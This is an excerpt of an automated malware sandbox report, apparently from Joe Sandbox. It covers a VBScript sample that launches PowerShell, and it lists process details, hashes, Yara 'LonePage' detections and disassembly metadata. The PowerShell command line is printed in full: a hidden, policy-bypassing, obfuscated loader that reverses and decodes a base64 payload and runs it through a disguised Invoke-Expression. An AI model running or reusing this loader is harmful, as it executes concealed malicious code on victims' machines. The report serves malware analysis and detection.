                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs"
                                Imagebase:0x7ff7128d0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:07:50:48
                                Start date:26/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
                                Imagebase:0x7ff760310000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:07:50:48
                                Start date:26/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff70f010000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FF886D15587 Relevance: 1.7, Strings: 1, Instructions: 459COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2045977690.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff886d10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @_H
                                  • API String ID: 0-518063247
                                  • Opcode ID: c059010f5fc3be46635def5696074f38ceb52c8fad9d40f46683651055797807
                                  • Instruction ID: 7ae32bf9ff1514d0e917fb5e483e15a3c7fab46e99cf142fe9f2f4564cc5c5f4
                                  • Opcode Fuzzy Hash: c059010f5fc3be46635def5696074f38ceb52c8fad9d40f46683651055797807
                                  • Instruction Fuzzy Hash: 38E123A1D1EBC98FE7629B6848556B5BFE0FF46260B0801FBD44ECB093DA5D9C05C392
                                  Function 00007FF886D1559E Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2045977690.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff886d10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @_H
                                  • API String ID: 0-518063247
                                  • Opcode ID: 3400895082ff58b136853f0a09501d795774a6f07cd5cc88baf552317a86a55e
                                  • Instruction ID: 3888b0af478c568d128bbc8b99457e825d9f5568b1d8124137dbf335e3a68b20
                                  • Opcode Fuzzy Hash: 3400895082ff58b136853f0a09501d795774a6f07cd5cc88baf552317a86a55e
                                  • Instruction Fuzzy Hash: 6BB1E2A1D1EBC64FE7A3977448656A5BFE1EF02260B1940FBC44ECB093D95E9C09C352
                                  Function 00007FF886D10000 Relevance: .5, Instructions: 487COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2045977690.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff886d10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9454935073a514edb13ef8a6ae27f84cf5d6b0642a2073d570a09107393cc203
                                  • Instruction ID: cb32580e9200026432613c0e0106be866b8ba661ab6b0ffc55365c847bbdf58a
                                  • Opcode Fuzzy Hash: 9454935073a514edb13ef8a6ae27f84cf5d6b0642a2073d570a09107393cc203
                                  • Instruction Fuzzy Hash: 0FE11421A0DBC54FE796EB2888659647FE1FF66250B0941FFC08ECB193CD1AAC46C781
                                  Function 00007FF886D12C05 Relevance: .5, Instructions: 471COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2045977690.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff886d10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d84f3ac2d81c15e5e9bc68bcec72758baef4bc9ade84d4c0188a26fe8e47fabd
                                  • Instruction ID: a887a2b2c724677646ed8107242acff461b7cc14085d4bff728698e013d55221
                                  • Opcode Fuzzy Hash: d84f3ac2d81c15e5e9bc68bcec72758baef4bc9ade84d4c0188a26fe8e47fabd
                                  • Instruction Fuzzy Hash: 64E1F662D0DACA8FE796967858662B5BFE1FF56260B0801FEC04EC70D3ED5A9C45C342
                                  Function 00007FF886D12CDA Relevance: .1, Instructions: 144COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2045977690.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff886d10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58b0890ce2a0915c3c56eefb868fbfb66ca46c56b4235c6cdc6b198cfe75389c
                                  • Instruction ID: 05c4fe0a99112f53a332e7b6ab6f42e105c74037112b3b68698e649ccd775fb8
                                  • Opcode Fuzzy Hash: 58b0890ce2a0915c3c56eefb868fbfb66ca46c56b4235c6cdc6b198cfe75389c
                                  • Instruction Fuzzy Hash: 0641E622D0EE878BF3AA96685857274E6D2FF956A4B4801B9C40FC30D3FD5B9C85C241
                                  Function 00007FF886D10252 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2045977690.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff886d10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f24f08b5e7163628588e4770a06f75e80d72dec8aba0be08dd7310b562753c8
                                  • Instruction ID: 8185b50ae7c323ab0be50c3dfbc0a4e122b1fc9ee55afbcc1395bff680ae64d1
                                  • Opcode Fuzzy Hash: 2f24f08b5e7163628588e4770a06f75e80d72dec8aba0be08dd7310b562753c8
                                  • Instruction Fuzzy Hash: E021B231308D049FEF4DEE18D45AE6973E1FBB9304714815DD04ACB692CE36E841CB81
                                  Function 00007FF886C43FC5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2045621589.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff886c40000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f618e0f7acb896b7a910d1980bd356b8e597761af119790937c9b08acbe72f0c
                                  • Instruction ID: d5736c32acc121af73b9a8f293735a400db07877d9203e4dfc65b4e40b6deb31
                                  • Opcode Fuzzy Hash: f618e0f7acb896b7a910d1980bd356b8e597761af119790937c9b08acbe72f0c
                                  • Instruction Fuzzy Hash: 6F01677115CB0C8FD744EF0CE455AA5B7E0FB95364F10056DE58AC3651D736E882CB46